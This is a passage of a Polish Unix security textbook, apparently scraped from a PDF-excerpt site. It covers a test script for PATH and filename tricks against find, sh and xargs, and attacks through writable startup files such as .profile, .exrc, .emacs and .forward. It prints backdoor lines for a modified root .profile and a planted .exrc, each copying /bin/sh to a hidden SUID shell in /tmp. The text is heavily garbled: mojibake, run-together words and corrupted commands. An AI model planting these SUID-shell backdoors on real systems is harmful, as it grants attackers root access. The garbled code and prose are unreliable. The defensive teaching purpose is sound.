[ Pobierz caÅ‚ość w formacie PDF ] ./wpadkathenecho "Ooops! Już tu jest find o nazwie wpadka."echo "UsuÅ„ go i spróbuj ponownie."ex i t lficat > wpadka « E-O-Fecho "Wpadka! JeÅ›li ten skrypt nie byÅ‚by taki miÅ‚y, miaÅ‚byÅ› problem! 1>&2" touch g$$ ex i t 2E-O-Fnazwa=foo; 'wpadka'touch "$nazwa"PATH=.:$PATHexport PATHfind /tmp -type f -exec echo (l \; > /dev/nullif test -f./g$$ thenecho "Ooops! find: wpadka"rm -f g$$ /else /echo "find: w porzÄ…dku" fi ^X/^TT -l * l sed 's/A/wc /' l sh > /dev/nullif test -f./g$$thenecho "Ooops! powÅ‚oka: wpadka"rm -f g$$ " >else ^echo "powÅ‚oka: w porzÄ…dku"fils -l | xargs ls >/dev/nullif test -f./g$$ ,thenecho "Ooops! xargs: wpadka"rm -f g$$ el seecho "xargs: w porzÄ…dku" /fi /rm -f./wpadka "Snazwa" g$$Ataki za pomocÄ… plików startowychRóżne programy majÄ… różne metody automatycznej inicjacji, ustawiania opcji i zmiennych dlaużytkownika.Raz ustawionych opcji zazwyczaj siÄ™ już nie zmienia.Dlatego sÄ… one polem dopopisu dla wÅ‚amywaczy wprowadzajÄ…cych ukryte zmiany, które bÄ™dÄ… automatycznie w ich imieniuwykonane.Problem nie polega na tym, że istniejÄ… pliki inicjacyjne, ale na tym, że ktoÅ› może do nichzapisywać dane.Wszystkie pliki startowe powinny być zabezpieczone, tak aby tylko wÅ‚aÅ›cicielmógÅ‚ do nich pisać.Nawet zezwalanie grupie na siÄ™ganie do nich może być niebezpieczne.Pliki.login,.profile, /etc/profileTe pliki sÄ… interpretowane podczas logowania użytkownika.Polecenia zawarte w nich sÄ…wykonywane przez powÅ‚okÄ™ użytkownika.Zezwolenie napastnikowi na zapisywanie do tych plikówmoże skutkować wykonywaniem zadanych przez niego plików podczas każdego logowania lubjednorazowo (i z ukrycia):: plik.profile użytkownika root w wersji zmienionej przez wÅ‚amywacza/bin/cp /bin/sh /tmp/.tajne/etc/chown root /tmp/.tajne/bin/chmod 4555 /tmp/.tajne: uruchomienie prawdziwego pliku.profile i usuniecie tego plikumv /.prawdziwy_profil e /.profile./.profilePliki.cshrc i.kshrcSÄ… to pliki, które można uruchamiać podczas logowania lub ponownego uruchamiania powÅ‚oki.MogÄ… być również uruchamiane po przeÅ‚Ä…czeniu siÄ™ na jakieÅ› konto za pomocÄ… polecenia su.GNU.emacsTen plik jest odczytywany i wykonywany podczas uruchamiania edytora GNU Emacs.W plikachstartowych użytkownika programu Emacs można zaszyć instrukcje w LISP-ie, za pomocÄ… którychmożliwe bÄ™dzie uruchamianie zaÅ‚ożonych z góry poleceÅ„.Poza tym, jeÅ›li jakikolwiek z katalogówwymienionych w Å›cieżce Å‚adowania jest zapisy walny, możliwa jest również zmiana modułówbibliotecznych z podobnym skutkiem.Plik.exrcTen plik jest odczytywany podczas inicjacji edytora vi lub ex.Szczególnie nieprzyjemne jest to, żejeÅ›li jakaÅ› wersja tego pliku znajduje siÄ™ w katalogu bieżącym, jego zawartość może byćwczytana i wykorzystana zamiast pliku z katalogu domowego użytkownika.Daje to wÅ‚amywaczowi możliwość wykonania nastÄ™pujÄ…cych poleceÅ„ w każdym katalogu, doktórego wÅ‚amywacz ma dostÄ™p:% cat >.exrc!(cp /b1n/sh /tmp/.tajne;chmod 4755 /tmp/.tajne)&*0JeÅ›li superużytkownik, który kiedykolwiek uruchomi edytor vi lub ex, bÄ™dÄ…c w jednym z tychkatalogów, utworzy interpreter sh typu SUID.Podczas uruchamiania edytora przez krótkÄ… chwilÄ™pojawi siÄ™ znak ! WÅ‚amywacz bÄ™dzie mógÅ‚ pózniej powrócić do tego pliku SUID i za jego pomocÄ…w peÅ‚ni skorzystać ze wszystkich zasobów systemu.Niektóre wersje programów, takich jak vi czy ex, pozwalajÄ… wydać polecenie set noexrcw zmiennej Å›rodowiskowej EXINIT.Uniemożliwia to odczytywanie i wykonywanielokalnych plików.exrc.Pliki.forward i.procmailrcNiektóre programy zarzÄ…dzajÄ…ce pocztÄ… (ang.mailer) pozwalajÄ… użytkownikowi umieszczaćspecjalne pliki w katalogu domowym.W programie sendmail użytkownik może podawać wybraneadresy i programy w pliku.forward.JeÅ›li wÅ‚amywacz może zapisywać do takiego pliku, możerównież zdefiniować dziaÅ‚anie polegajÄ…ce na tym, że po otrzymaniu listu uruchamiany bÄ™dziewskazany program - na przykÅ‚ad skrypt, który w katalogu /tmp utworzy powÅ‚okÄ™ SUID.Wiele popularnych programów zarzÄ…dzajÄ…cych pocztÄ… pozwala użytkownikom używać programówfiltrujÄ…cych, które przetwarzajÄ… listy pocztowe w sposób półautomatyczny.Dotyczy to takichsystemów jak procmail, MH, elm i wielu innych.Niektóre z nich majÄ… caÅ‚kiem spore możliwoÅ›ci,ale stanowiÄ… również potencjalne zagrożenie dla bezpieczeÅ„stwa systemu
[ Pobierz całość w formacie PDF ] zanotowane.pldoc.pisz.plpdf.pisz.plmikr.xlx.pl
|